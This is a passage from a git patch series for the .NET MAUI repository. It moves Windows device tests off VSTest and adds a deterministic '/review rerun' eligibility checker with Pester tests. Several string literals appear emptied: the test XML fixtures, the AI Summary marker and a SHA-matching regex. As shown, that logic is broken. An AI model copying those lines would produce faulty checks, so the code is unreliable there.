b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 index c816ac000501..1ca3cbe16a8e 100644 --- a/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 +++ b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 @@ -41,6 +41,10 @@ function Test-IsTryFixCommentBody { return $false } + if ($Body.Contains($script:AiSummaryCommentMarker)) { + return $false + } + return $Body.Contains($script:TryFixCommentMarker) -or ($Body.Contains('Automated review') -and $Body.Contains('alternative fix proposed')) -or ($Body.Contains('try-fix-') -and $Body.Contains('Candidate diff')) From 5f3beaa8c9e2fe275fb8f536bb0f6e965e214d5c Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 20:54:13 +0200 Subject: [PATCH 21/34] Run Windows device tests without VSTest Use the built Windows device-test app directly for gate validation so the runner avoids testhost dependency crashes and matches the canonical windows.cake path. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/skills/run-device-tests/SKILL.md | 6 +- .../scripts/Run-DeviceTests.Tests.ps1 | 86 ++++++ .../scripts/Run-DeviceTests.ps1 | 259 ++++++++++++++++-- 3 files changed, 326 insertions(+), 25 deletions(-) create mode 100644 .github/skills/run-device-tests/scripts/Run-DeviceTests.Tests.ps1 diff --git a/.github/skills/run-device-tests/SKILL.md b/.github/skills/run-device-tests/SKILL.md index 5ad415535a11..1a4dc10098da 100644 --- a/.github/skills/run-device-tests/SKILL.md +++ b/.github/skills/run-device-tests/SKILL.md @@ -157,7 +157,7 @@ pwsh .github/skills/run-device-tests/scripts/Run-DeviceTests.ps1 -Project Core - - Windows tests run directly on the local machine - Simulator/emulator selection and boot logic is handled by `.github/scripts/shared/Start-Emulator.ps1` - xharness manages test execution and reporting for iOS/MacCatalyst/Android -- Windows uses vstest for test execution +- Windows runs the built device-test app directly and reads its xUnit XML results, matching `eng/devices/windows.cake` ## Test Filtering @@ -191,7 +191,7 @@ Test filtering is implemented in `src/Core/tests/DeviceTests.Shared/DeviceTestSh |----------|---------------------|-------------------| | **iOS/MacCatalyst** | `--set-env=TestFilter=...` | `NSProcessInfo.ProcessInfo.Environment["TestFilter"]` | | **Android** | `--arg TestFilter=...` | `MauiTestInstrumentation.Current.Arguments.GetString("TestFilter")` | -| **Windows** | `--filter "Category=..."` | Native vstest filter | +| **Windows Controls** | App argument selects discovered category index | `ControlsHeadlessTestRunner` category loop | ### Available Test Categories @@ -258,7 +258,7 @@ The script automatically handles XHarness device targeting for iOS and Android: ### Windows - No device/emulator needed -- Uses vstest (`dotnet test`) for test execution +- Runs the built device-test app directly and parses `TestResults-*.xml` **Why both --target and --device for iOS?** - XHarness requires `--target ios-simulator-64` (or `ios-simulator-64_VERSION`) to specify platform type diff --git a/.github/skills/run-device-tests/scripts/Run-DeviceTests.Tests.ps1 b/.github/skills/run-device-tests/scripts/Run-DeviceTests.Tests.ps1 new file mode 100644 index 000000000000..5590ed3deea2 --- /dev/null +++ b/.github/skills/run-device-tests/scripts/Run-DeviceTests.Tests.ps1 @@ -0,0 +1,86 @@ +#!/usr/bin/env pwsh +#Requires -Modules Pester + +BeforeAll { + $scriptPath = Join-Path $PSScriptRoot 'Run-DeviceTests.ps1' + $tokens = $null + $parseErrors = $null + $ast = [System.Management.Automation.Language.Parser]::ParseFile($scriptPath, [ref]$tokens, [ref]$parseErrors) + if ($parseErrors -and $parseErrors.Count -gt 0) { + throw ($parseErrors | ForEach-Object { $_.Message }) -join [Environment]::NewLine + } + + foreach ($functionName in @( + 'Get-CategoryFiltersFromTestFilter', + 'Select-WindowsDeviceTestCategories', + 'Get-WindowsDeviceTestResultSummary' + )) { + $function = $ast.Find({ + $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] -and + $args[0].Name -eq $functionName + }, $true) + + if (-not $function) { + throw "Function '$functionName' not found" + } + + Invoke-Expression $function.Extent.Text + } +} + +Describe 'Windows device test category filtering' { + It 'extracts Category filters from VSTest-style expressions' { + Get-CategoryFiltersFromTestFilter -Filter 'Category=Window|Category=Button' | + Should -Be @('Window', 'Button') + } + + It 'selects matching discovered categories case-insensitively' { + Select-WindowsDeviceTestCategories ` + -AllCategories @('Button', 'Window', 'Shell') ` + -Filter 'Category=window' | + Should -Be @('Window') + } + + It 'returns all categories when no category filter is supplied' { + Select-WindowsDeviceTestCategories ` + -AllCategories @('Button', 'Window') ` + -Filter '' | + Should -Be @('Button', 'Window') + } +} + +Describe 'Get-WindowsDeviceTestResultSummary' { + BeforeEach { + $script:testDir = Join-Path ([System.IO.Path]::GetTempPath()) "windows-device-results-$([guid]::NewGuid())" + New-Item -ItemType Directory -Path $script:testDir -Force | Out-Null + } + + AfterEach { + Remove-Item -LiteralPath $script:testDir -Recurse -Force -ErrorAction SilentlyContinue + } + + It 'aggregates xUnit assembly counters from Windows device-test XML files' { + $file1 = Join-Path $script:testDir 'TestResults-One.xml' + $file2 = Join-Path $script:testDir 'TestResults-Two.xml' + + @' + + + +'@ | Set-Content $file1 -Encoding UTF8 + + @' + + + +'@ | Set-Content $file2 -Encoding UTF8 + + $summary = Get-WindowsDeviceTestResultSummary -ResultFiles @($file1, $file2) + + $summary.Total | Should -Be 5 + $summary.Passed | Should -Be 3 + $summary.Failed | Should -Be 1 + $summary.Skipped | Should -Be 1 + $summary.Errors | Should -Be 0 + } +} diff --git a/.github/skills/run-device-tests/scripts/Run-DeviceTests.ps1 b/.github/skills/run-device-tests/scripts/Run-DeviceTests.ps1 index 5a94bf00fb2a..9d8cd1c5eb1f 100644 --- a/.github/skills/run-device-tests/scripts/Run-DeviceTests.ps1 +++ b/.github/skills/run-device-tests/scripts/Run-DeviceTests.ps1 @@ -1,6 +1,6 @@ <# .SYNOPSIS - Builds and runs .NET MAUI device tests locally using xharness (Apple/Android) or vstest (Windows). + Builds and runs .NET MAUI device tests locally using xharness (Apple/Android) or the Windows device-test app directly. .DESCRIPTION This script builds a specified MAUI device test project for the target platform @@ -140,6 +140,224 @@ $AppNames = @{ "AI" = "Microsoft.Maui.Essentials.AI.DeviceTests" } +$WindowsDeviceTestPackageIds = @{ + "Controls" = "Microsoft.Maui.Controls.DeviceTests" + "Core" = "Microsoft.Maui.Core.DeviceTests" + "Essentials" = "Microsoft.Maui.Essentials.DeviceTests" + "Graphics" = "Microsoft.Maui.Graphics.DeviceTests" + "BlazorWebView" = "Microsoft.Maui.MauiBlazorWebView.DeviceTests" + "AI" = "Microsoft.Maui.Essentials.AI.DeviceTests" +} + +function Get-CategoryFiltersFromTestFilter { + param([string]$Filter) + + if ([string]::IsNullOrWhiteSpace($Filter)) { + return @() + } + + $categories = @() + $matches = [regex]::Matches($Filter, '(?i)\bCategory\s*=\s*([^\|&(),]+)') + foreach ($match in $matches) { + $value = $match.Groups[1].Value.Trim().Trim('"', "'") + if (-not [string]::IsNullOrWhiteSpace($value)) { + $categories += $value + } + } + + if ($categories.Count -eq 0 -and $Filter -notmatch '[=~]') { + $categories = @($Filter -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ }) + } + + return @($categories | Select-Object -Unique) +} + +function Select-WindowsDeviceTestCategories { + param( + [string[]]$AllCategories, + [string]$Filter + ) + + $filters = @(Get-CategoryFiltersFromTestFilter -Filter $Filter) + if ($filters.Count -eq 0) { + return @($AllCategories) + } + + return @($AllCategories | Where-Object { + $category = $_ + @($filters | Where-Object { + $category.Equals($_, [System.StringComparison]::OrdinalIgnoreCase) -or + $category.IndexOf($_, [System.StringComparison]::OrdinalIgnoreCase) -ge 0 + }).Count -gt 0 + }) +} + +function Wait-ForPath { + param( + [Parameter(Mandatory = $true)] + [string]$Path, + + [Parameter(Mandatory = $true)] + [int]$TimeoutSeconds, + + [System.Diagnostics.Process]$Process + ) + + $stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + while ($stopwatch.Elapsed.TotalSeconds -lt $TimeoutSeconds) { + if (Test-Path $Path) { + return $true + } + + if ($Process -and $Process.HasExited) { + Start-Sleep -Seconds 1 + if (Test-Path $Path) { + return $true + } + return $false + } + + Start-Sleep -Seconds 1 + } + + return (Test-Path $Path) +} + +function Get-WindowsDeviceTestResultSummary { + param([Parameter(Mandatory = $true)][string[]]$ResultFiles) + + $summary = @{ + Total = 0 + Passed = 0 + Failed = 0 + Skipped = 0 + Errors = 0 + } + + foreach ($file in $ResultFiles) { + if (-not (Test-Path $file)) { + continue + } + + [xml]$xml = Get-Content $file -Raw + $assemblies = @($xml.SelectNodes('/assemblies/assembly')) + foreach ($assembly in $assemblies) { + $summary.Total += [int]($assembly.total ?? 0) + $summary.Passed += [int]($assembly.passed ?? 0) + $summary.Failed += [int]($assembly.failed ?? 0) + $summary.Skipped += [int]($assembly.skipped ?? 0) + $summary.Errors += [int]($assembly.errors ?? 0) + } + } + + return $summary +} + +function Invoke-WindowsDeviceTestApp { + param( + [Parameter(Mandatory = $true)] + [string]$AppPath, + + [Parameter(Mandatory = $true)] + [string]$Project, + + [Parameter(Mandatory = $true)] + [string]$AppName, + + [Parameter(Mandatory = $true)] + [string]$OutputDirectory, + + [string]$TestFilter, + + [string]$Timeout = "01:00:00" + ) + + $timeoutSeconds = [int][TimeSpan]::Parse($Timeout).TotalSeconds + if ($timeoutSeconds -le 0) { + $timeoutSeconds = 3600 + } + + if (-not (Test-Path $OutputDirectory)) { + New-Item -ItemType Directory -Path $OutputDirectory -Force | Out-Null + } + + $packageId = $WindowsDeviceTestPackageIds[$Project] + if (-not $packageId) { + $packageId = $AppName + } + + $resultBase = Join-Path $OutputDirectory "TestResults-$($packageId.Replace('.', '_'))" + $resultFile = "$resultBase.xml" + $categoriesFile = Join-Path $OutputDirectory "devicetestcategories.txt" + Remove-Item -LiteralPath $categoriesFile -Force -ErrorAction SilentlyContinue + Remove-Item -Path "$resultBase*.xml" -Force -ErrorAction SilentlyContinue + + $resultFiles = @() + if ($Project -eq "Controls") { + Write-Host "Discovering Windows device test categories..." -ForegroundColor Gray + $discoveryProcess = Start-Process -FilePath $AppPath -ArgumentList @($resultFile, "-1") -PassThru + if (-not (Wait-ForPath -Path $categoriesFile -TimeoutSeconds 120 -Process $discoveryProcess)) { + if ($discoveryProcess -and -not $discoveryProcess.HasExited) { + Stop-Process -Id $discoveryProcess.Id -Force -ErrorAction SilentlyContinue + } + throw "Windows device test category discovery did not create $categoriesFile" + } + + $allCategories = @(Get-Content $categoriesFile | Where-Object { -not [string]::IsNullOrWhiteSpace($_) }) + $selectedCategories = @(Select-WindowsDeviceTestCategories -AllCategories $allCategories -Filter $TestFilter) + if ($selectedCategories.Count -eq 0) { + throw "Test filter '$TestFilter' matched 0 Windows device test categories. Available categories: $($allCategories -join ', ')" + } + + Write-Host "Running $($selectedCategories.Count) of $($allCategories.Count) Windows device test categor$(if ($selectedCategories.Count -eq 1) { 'y' } else { 'ies' }): $($selectedCategories -join ', ')" -ForegroundColor Yellow + + foreach ($category in $selectedCategories) { + $categoryIndex = [Array]::IndexOf($allCategories, $category) + if ($categoryIndex -lt 0) { + throw "Could not find category '$category' in discovered category list." + } + + $categoryResultFile = "$resultBase`_$category.xml" + Remove-Item -LiteralPath $categoryResultFile -Force -ErrorAction SilentlyContinue + Write-Host "Running Windows device test category '$category' (index $categoryIndex)..." -ForegroundColor Gray + $process = Start-Process -FilePath $AppPath -ArgumentList @($resultFile, [string]$categoryIndex) -PassThru + if (-not (Wait-ForPath -Path $categoryResultFile -TimeoutSeconds $timeoutSeconds -Process $process)) { + if ($process -and -not $process.HasExited) { + Stop-Process -Id $process.Id -Force -ErrorAction SilentlyContinue + } + throw "Windows device test category '$category' did not create $categoryResultFile" + } + + $resultFiles += $categoryResultFile + } + } else { + if ($TestFilter) { + Write-Warning "Windows non-Controls device tests do not support dynamic category filtering; running the full $Project device test app." + } + + Write-Host "Running Windows device test app directly..." -ForegroundColor Gray + $process = Start-Process -FilePath $AppPath -ArgumentList @($resultFile) -PassThru + if (-not (Wait-ForPath -Path $resultFile -TimeoutSeconds $timeoutSeconds -Process $process)) { + if ($process -and -not $process.HasExited) { + Stop-Process -Id $process.Id -Force -ErrorAction SilentlyContinue + } + throw "Windows device test app did not create $resultFile" + } + + $resultFiles += $resultFile + } + + $summary = Get-WindowsDeviceTestResultSummary -ResultFiles $resultFiles + $script:WindowsDeviceTestSummary = $summary + $script:WindowsDeviceTestResultFiles = $resultFiles + + if (($summary.Failed + $summary.Errors) -eq 0) { + return 0 + } + + return 1 +} + # Android package names (lowercase) $AndroidPackageNames = @{ "Controls" = "com.microsoft.maui.controls.devicetests" @@ -576,32 +794,29 @@ try { $testExitCode = $LASTEXITCODE } else { # ═══════════════════════════════════════════════════════════ - # VSTEST EXECUTION (Windows) + # WINDOWS DEVICE TEST EXECUTION # ═══════════════════════════════════════════════════════════ - - Write-Host "Running tests with vstest..." -ForegroundColor Gray - Write-Host "" - - $vstestArgs = @( - "test" - $projectPath - "-c", $Configuration - "-f", $platformConfig.Tfm - "--no-build" - "--logger", "trx;LogFileName=TestResults.trx" - "--results-directory", $OutputDirectory - ) - if ($TestFilter) { - $vstestArgs += "--filter", $TestFilter - } - - Write-Host "Running: dotnet $($vstestArgs -join ' ')" -ForegroundColor Gray + Write-Host "Running Windows device test app directly..." -ForegroundColor Gray + Write-Host "This matches eng/devices/windows.cake and avoids VSTest/testhost for MAUI Windows device apps." -ForegroundColor Gray Write-Host "" - & dotnet @vstestArgs + $testExitCode = Invoke-WindowsDeviceTestApp ` + -AppPath $appPath ` + -Project $Project ` + -AppName $appName ` + -OutputDirectory $OutputDirectory ` + -TestFilter $TestFilter ` + -Timeout $Timeout - $testExitCode = $LASTEXITCODE + if ($script:WindowsDeviceTestSummary) { + Write-Host "" + Write-Output " Passed: $($script:WindowsDeviceTestSummary.Passed)" + Write-Output " Failed: $($script:WindowsDeviceTestSummary.Failed + $script:WindowsDeviceTestSummary.Errors)" + Write-Output " Skipped: $($script:WindowsDeviceTestSummary.Skipped)" + Write-Output " Total: $($script:WindowsDeviceTestSummary.Total)" + Write-Host " Result file(s): $($script:WindowsDeviceTestResultFiles -join ', ')" -ForegroundColor Gray + } } # ═══════════════════════════════════════════════════════════ From 4b8e6dc02e497598557ed98e215ba51cd9c2ef41 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 21:17:27 +0200 Subject: [PATCH 22/34] Add deterministic review rerun gate Teach /review rerun to run a deterministic activity check for new comments or commits and apply s/agent-ready-for-rerun when another AI review is justified. Also add rerun guidance to generated AI Summary comments. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/docs/agent-labels.md | 8 +- .../Resolve-RerunEligibility.Tests.ps1 | 211 ++++++++++++ .github/scripts/Resolve-RerunEligibility.ps1 | 313 ++++++++++++++++++ .github/scripts/post-ai-summary-comment.ps1 | 1 + .github/scripts/shared/Update-AgentLabels.ps1 | 1 + .github/workflows/review-trigger.yml | 56 +++- 6 files changed, 586 insertions(+), 4 deletions(-) create mode 100644 .github/scripts/Resolve-RerunEligibility.Tests.ps1 create mode 100644 .github/scripts/Resolve-RerunEligibility.ps1 diff --git a/.github/docs/agent-labels.md b/.github/docs/agent-labels.md index 2a43521e4c14..13f5be605ed8 100644 --- a/.github/docs/agent-labels.md +++ b/.github/docs/agent-labels.md @@ -41,13 +41,14 @@ Always applied on every completed agent run. |-------|-------|-------------|--------------| | `s/agent-reviewed` | 🔵 `#1565C0` | PR was reviewed by AI agent workflow (full 4-phase review) | Every completed agent run | -### Manual Label +### Manual / Queue Labels -Applied by MAUI maintainers, not by automation. +Manual labels are applied by MAUI maintainers. Queue labels are applied by deterministic automation, not by AI. | Label | Color | Description | Applied When | |-------|-------|-------------|--------------| | `s/agent-fix-implemented` | 🟣 `#7B1FA2` | PR author implemented the agent's suggested fix | Maintainer applies when PR author adopts agent's recommendation | +| `s/agent-ready-for-rerun` | 🟣 `#5319E7` | AI review has new PR activity and is ready for rerun | `/review rerun` finds new comments or commits after the latest AI Summary / previous rerun request | --- @@ -71,7 +72,7 @@ Review-PR.ps1 └── Non-fatal: errors warn but don't fail the workflow ``` -Labels are applied exclusively from `Review-PR.ps1` Phase 4. No other script applies agent labels. This single-source design avoids label conflicts and simplifies debugging. +Most review outcome labels are applied from `Review-PR.ps1` Phase 4. The exception is `s/agent-ready-for-rerun`, which is applied by the deterministic `/review rerun` GitHub Action path after checking for new comments or commits. The rerun path does not use AI to decide whether the label applies. ### How Labels Are Parsed @@ -140,6 +141,7 @@ is:pr label:s/agent-reviewed |------|---------| | `.github/scripts/shared/Update-AgentLabels.ps1` | Label helper module (all label logic) | | `.github/scripts/Review-PR.ps1` | Orchestrator that calls `Apply-AgentLabels` in Phase 4 | +| `.github/scripts/Resolve-RerunEligibility.ps1` | Deterministic `/review rerun` checker that can apply `s/agent-ready-for-rerun` | | `.github/skills/pr-review/SKILL.md` | Documents label system for the pr-review skill | ### Key Functions diff --git a/.github/scripts/Resolve-RerunEligibility.Tests.ps1 b/.github/scripts/Resolve-RerunEligibility.Tests.ps1 new file mode 100644 index 000000000000..35911de8ac4e --- /dev/null +++ b/.github/scripts/Resolve-RerunEligibility.Tests.ps1 @@ -0,0 +1,211 @@ +BeforeAll { + . "$PSScriptRoot/Resolve-RerunEligibility.ps1" -PRNumber 1 -CurrentCommentId 1 + + function New-TestUser { + param( + [string]$Login = 'dev-user', + [string]$Type = 'User' + ) + + [pscustomobject]@{ + login = $Login + type = $Type + } + } + + function New-TestComment { + param( + [int64]$Id, + [string]$Body, + [string]$CreatedAt, + [string]$UpdatedAt = $CreatedAt, + [string]$Login = 'dev-user', + [string]$Type = 'User', + [string]$Kind = 'issue-comment' + ) + + [pscustomobject]@{ + id = $Id + kind = $Kind + body = $Body + created_at = $CreatedAt + updated_at = $UpdatedAt + user = New-TestUser -Login $Login -Type $Type + } + } + + function New-TestCommit { + param( + [string]$Sha, + [string]$Date + ) + + [pscustomobject]@{ + sha = $Sha + commit = [pscustomobject]@{ + author = [pscustomobject]@{ date = $Date } + committer = [pscustomobject]@{ date = $Date } + } + } + } + + function New-AISummaryBody { + param([string]$Sha = 'abcdef1') + + @" + + +## AI Review Summary + + +
+Review Sessions — click to expand +
+ +"@ + } +} + +Describe 'Resolve-RerunEligibility' { + It 'rejects commands when no AI Summary exists' { + $comments = @( + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeFalse + $result.Reason | Should -Be 'no-ai-summary' + } + + It 'rejects a rerun command when there are no new comments or commits' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeFalse + $result.Reason | Should -Be 'no-new-comments-or-commits' + } + + It 'accepts a non-command comment after the latest AI Summary' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 2 -Body 'I pushed the requested update.' -CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeTrue + $result.Reason | Should -Be 'new-comment-after-ai-summary' + } + + It 'does not count repeated rerun commands as evidence' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 9 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeFalse + $result.Reason | Should -Be 'no-new-comments-or-commits' + } + + It 'accepts a non-command comment after the previous rerun command' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 8 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 9 -Body 'Follow-up detail after rerun request.' -CreatedAt '2026-05-31T09:50:00Z' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeTrue + $result.Reason | Should -Be 'new-comment-after-previous-rerun' + } + + It 'does not reuse old activity from before a previous rerun command' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 7 -Body 'Old follow-up before the first rerun.' -CreatedAt '2026-05-31T09:40:00Z' + New-TestComment -Id 8 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeFalse + $result.Reason | Should -Be 'no-new-comments-or-commits' + } + + It 'finds AI Summary content posted as a PR review' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' -Kind 'review' + New-TestComment -Id 2 -Body 'Follow-up after the review.' -CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeTrue + $result.Reason | Should -Be 'new-comment-after-ai-summary' + } + + It 'accepts a current head SHA that differs from the latest reviewed session' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody -Sha 'abcdef1') -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'fedcba9876543210' + + $result.Eligible | Should -BeTrue + $result.Reason | Should -Be 'new-head-commit' + } + + It 'accepts a commit after the previous rerun command' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 8 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + $commits = @( + New-TestCommit -Sha 'abcdef123' -Date '2026-05-31T09:50:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits $commits -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeTrue + $result.Reason | Should -Be 'new-commit-after-previous-rerun' + } + + It 'rejects bot rerun comments' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' -Login 'maui-bot' -Type 'Bot' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeFalse + $result.Reason | Should -Be 'bot-comment' + } + + It 'is idempotent when ready-for-rerun label already exists' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' -CurrentLabels @('s/agent-ready-for-rerun') + + $result.Eligible | Should -BeTrue + $result.Reason | Should -Be 'label-already-present' + } +} diff --git a/.github/scripts/Resolve-RerunEligibility.ps1 b/.github/scripts/Resolve-RerunEligibility.ps1 new file mode 100644 index 000000000000..72eca378f866 --- /dev/null +++ b/.github/scripts/Resolve-RerunEligibility.ps1 @@ -0,0 +1,313 @@ +#!/usr/bin/env pwsh +<# +.SYNOPSIS + Determines whether a /review rerun request should mark a PR ready for rerun. + +.DESCRIPTION + This script is intentionally deterministic: it never uses AI and never + inspects untrusted text semantically. A rerun is eligible only when there is + new PR activity after the previous AI Summary or previous /review rerun: + a new non-command comment, or a new commit. +#> + +param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [Parameter(Mandatory = $true)] + [Int64]$CurrentCommentId, + + [string]$Owner = 'dotnet', + [string]$Repo = 'maui', + + [switch]$ApplyLabel +) + +$ErrorActionPreference = 'Stop' +$AISummaryMarker = '' +$ReadyForRerunLabel = 's/agent-ready-for-rerun' +$ReadyForRerunLabelDescription = 'AI review has new PR activity and is ready for rerun' +$ReadyForRerunLabelColor = '5319E7' + +function ConvertTo-DateTimeOffset { + param([Parameter(Mandatory = $true)]$Value) + + if ($Value -is [datetimeoffset]) { + return $Value + } + if ($Value -is [datetime]) { + return [datetimeoffset]$Value + } + return [datetimeoffset]::Parse([string]$Value, [Globalization.CultureInfo]::InvariantCulture, [Globalization.DateTimeStyles]::AssumeUniversal) +} + +function Test-RerunCommand { + param([string]$Body) + + return ([string]$Body).Trim() -match '(?i)^/review\s+rerun\s*$' +} + +function Get-ObjectDate { + param( + [Parameter(Mandatory = $true)]$Object, + [Parameter(Mandatory = $true)][string]$PropertyName + ) + + $value = $Object.$PropertyName + if ($null -eq $value) { + return $null + } + + return ConvertTo-DateTimeOffset $value +} + +function Get-LatestAISummaryComment { + param([object[]]$Comments) + + return @($Comments | + Where-Object { $_.body -and ([string]$_.body).Contains($AISummaryMarker) } | + Sort-Object @{ Expression = { Get-ObjectDate $_ 'updated_at' }; Descending = $true }, @{ Expression = { [Int64]$_.id }; Descending = $true } | + Select-Object -First 1) +} + +function Get-LatestRerunCommentBefore { + param( + [object[]]$Comments, + [Parameter(Mandatory = $true)][Int64]$CurrentCommentId + ) + + $current = @($Comments | Where-Object { [Int64]$_.id -eq $CurrentCommentId } | Select-Object -First 1) + if (-not $current) { + return $null + } + + $currentCreatedAt = Get-ObjectDate $current 'created_at' + return @($Comments | + Where-Object { + [Int64]$_.id -ne $CurrentCommentId -and + (Test-RerunCommand $_.body) -and + (Get-ObjectDate $_ 'created_at') -lt $currentCreatedAt + } | + Sort-Object @{ Expression = { Get-ObjectDate $_ 'created_at' }; Descending = $true }, @{ Expression = { [Int64]$_.id }; Descending = $true } | + Select-Object -First 1) +} + +function Get-LatestReviewedSha { + param([string]$AISummaryBody) + + if ([string]::IsNullOrWhiteSpace($AISummaryBody)) { + return $null + } + + $matches = [regex]::Matches($AISummaryBody, '') + if ($matches.Count -eq 0) { + return $null + } + + return $matches[$matches.Count - 1].Groups[1].Value.ToLowerInvariant() +} + +function Test-CommentIsEvidence { + param( + [Parameter(Mandatory = $true)]$Comment, + [Parameter(Mandatory = $true)][Int64]$CurrentCommentId + ) + + if ([Int64]$Comment.id -eq $CurrentCommentId) { + return $false + } + if (Test-RerunCommand $Comment.body) { + return $false + } + if ($Comment.user -and $Comment.user.type -eq 'Bot') { + return $false + } + if ($Comment.user -and $Comment.user.login -match '(?i)^(maui-bot|github-actions)(\[bot\])?$') { + return $false + } + + return $true +} + +function Test-HasEvidenceCommentAfter { + param( + [object[]]$Comments, + [Parameter(Mandatory = $true)][datetimeoffset]$Checkpoint, + [Parameter(Mandatory = $true)][Int64]$CurrentCommentId + ) + + return [bool]@($Comments | Where-Object { + (Test-CommentIsEvidence -Comment $_ -CurrentCommentId $CurrentCommentId) -and + (Get-ObjectDate $_ 'created_at') -gt $Checkpoint + } | Select-Object -First 1) +} + +function Test-HasCommitAfter { + param( + [object[]]$Commits, + [Parameter(Mandatory = $true)][datetimeoffset]$Checkpoint + ) + + return [bool]@($Commits | Where-Object { + $date = $null + if ($_.commit -and $_.commit.committer -and $_.commit.committer.date) { + $date = ConvertTo-DateTimeOffset $_.commit.committer.date + } elseif ($_.commit -and $_.commit.author -and $_.commit.author.date) { + $date = ConvertTo-DateTimeOffset $_.commit.author.date + } + + $date -and $date -gt $Checkpoint + } | Select-Object -First 1) +} + +function Test-HeadDiffersFromReviewedSha { + param( + [string]$CurrentHeadSha, + [string]$LatestReviewedSha + ) + + if ([string]::IsNullOrWhiteSpace($CurrentHeadSha) -or 